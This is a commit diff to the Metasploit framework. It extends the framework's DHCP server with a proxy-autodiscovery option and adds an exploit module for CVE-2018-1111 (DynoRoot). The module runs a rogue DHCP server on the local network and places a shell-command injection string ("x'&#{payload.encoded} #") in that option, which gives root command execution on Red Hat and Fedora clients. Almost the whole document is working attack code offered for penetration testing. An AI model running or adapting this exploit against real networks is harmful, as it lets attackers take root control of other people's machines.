Add CVE-2018-1111 exploit

lib/rex/proto/dhcp/constants.rb

@@ -23,6 +23,7 @@ module DHCP
 OpDns = 6
 OpHostname = 0x0c
 OpURL = 0x72
+OpProxyAutodiscovery = 0xfc
 OpEnd = 0xff
 
 PXEMagic = "\xF1\x00\x74\x7E"

lib/rex/proto/dhcp/server.rb

@@ -128,7 +128,7 @@ def stop
   def set_option(opts)
     allowed_options = [
       :serveOnce, :pxealtconfigfile, :servePXE, :relayip, :leasetime, :dnsserv,
-      :pxeconfigfile, :pxepathprefix, :pxereboottime, :router,
+      :pxeconfigfile, :pxepathprefix, :pxereboottime, :router, :proxy_auto_discovery,
       :give_hostname, :served_hostname, :served_over, :serveOnlyPXE, :domain_name, :url
     ]
 
@@ -154,7 +154,7 @@ def send_packet(ip, pkt)
   end
 
   attr_accessor :listen_host, :listen_port, :context, :leasetime, :relayip, :router, :dnsserv
-  attr_accessor :domain_name
+  attr_accessor :domain_name, :proxy_auto_discovery
   attr_accessor :sock, :thread, :myfilename, :ipstring, :served, :serveOnce
   attr_accessor :current_ip, :start_ip, :end_ip, :broadcasta, :netmaskn
   attr_accessor :servePXE, :pxeconfigfile, :pxealtconfigfile, :pxepathprefix, :pxereboottime, :serveOnlyPXE
@@ -292,6 +292,7 @@ def dispatch_request(from, buf)
     end
 
     # Options!
+    pkt << dhcpoption(OpProxyAutodiscovery, self.proxy_auto_discovery) if self.proxy_auto_discovery
     pkt << dhcpoption(OpDHCPServer, self.ipstring)
     pkt << dhcpoption(OpLeaseTime, [self.leasetime].pack('N'))
     pkt << dhcpoption(OpSubnetMask, self.netmaskn)

modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb

@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/dhcp'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::DHCPServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DHCP Client Command Injection (DynoRoot)',
+      'Description'    => %q{
+        This module exploits the DynoRoot vulnerability, a flaw in how the
+         NetworkManager integration script included in the DHCP client in
+         Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
+         processes DHCP options. A malicious DHCP server, or an attacker on
+         the local network able to spoof DHCP responses, could use this flaw
+         to execute arbitrary commands with root privileges on systems using
+         NetworkManager and configured to obtain network configuration using
+         the DHCP protocol.
+      },
+      'Author'         =>
+        [
+          'Felix Wilhelm', # Vulnerability discovery
+          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'References'     =>
+        [
+          ['CVE', '2018-1111'],
+          ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
+          ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
+          ['URL', 'https://dynoroot.ninja/'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
+        ],
+      'Payload'        =>
+        {
+          # 255 for a domain name, minus some room for encoding
+          'Space'       => 200,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+            }
+        },
+      'Targets'        => [ [ 'Automatic Target', { }] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'May 15 2018'
+    ))
+
+    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
+  end
+
+  def exploit
+    hash = datastore.copy
+    start_service(hash)
+    @dhcp.set_option(proxy_auto_discovery: "x'&#{payload.encoded} #")
+
+    begin
+      while @dhcp.thread.alive?
+        sleep 2
+      end
+    ensure
+      stop_service
+    end
+  end
+end
+